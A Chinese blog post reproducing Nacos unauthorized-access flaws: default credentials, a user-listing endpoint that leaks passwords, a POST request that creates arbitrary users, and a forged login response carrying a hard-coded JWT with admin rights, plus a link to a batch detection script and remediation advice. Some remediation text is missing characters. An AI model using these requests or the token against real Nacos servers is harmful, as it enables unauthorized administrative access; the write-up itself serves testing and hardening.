Nacos未授权访问漏洞复现

1 弱口令:nacos/nacos

http://ip:8848/nacos

 以上网址是默认登录页面地址,如图

 尝试用弱口令nacos/nacos登录。


2 账号及密码泄露

http://ip:8848/nacos/v1/auth/users?pageNo=1&pageSize=9

访问以上地址可以获取到已有的用户名和密码,如图


3 创建任意用户

POST http://ip:8848/nacos/v1/auth/users?username=test1&password=test1

抓包将GET改成POST提交,即可创建任意用户

 使用创建的test1/test1 用户成功登录


4 未授权访问

更改登录时的回包,即可直接管理员权限登录,回包内容如下:

HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb

{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

将此回包更改

更改成以下内容

nacos用户成功登录 


5 批量检测脚本

https://github.com/tonmonkey/TNacos

脚本来源:

基于Python3对Nacos相关漏洞的检测脚本编写 | Tommonkey

 

 

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
对于Nacos授权访问漏洞,建议你采取以下措施进行修: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修漏洞。 2. 配置访问控制:通过配置适当的访问控制策略,限制只有授权的用户或者IP可以访问Nacos。可以使用Nacos的权限管理功能来实。 3. 强化认证和授权:启用强密码策略,使用杂的密码,并定期更换密码。确保只有授权用户具有适当的权限来访问和管理Nacos。 4. 防火墙设置:配置防火墙来限制对Nacos访问,只允许来自可信源IP地址的请求。 5. 安全审计日志:启用安全审计日志功能,记录所有关键操作和访问日志。这有助于发异常行为和及时应对潜在的安全威胁。 6. 定期备份:定期备份Nacos的数据,以防止数据丢失或损坏。备份可以帮助你在遭受攻击或数据丢失时快速恢。 7. 安全漏洞扫描和测试:与安全团队合作,进行定期的安全漏洞扫描和安全测试,以发并修潜在的安全问题。 8. 及时响应:如果你发任何安全问题或漏洞,应立即采取措施进行修和调查。可以向Nacos官方团队报告漏洞,并升级到已修漏洞的版本。 请记住,安全是一个持续的过程,需要不断地关注和改进。通过以上措施,你可以提高Nacos的安全性,并减少授权访问漏洞的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值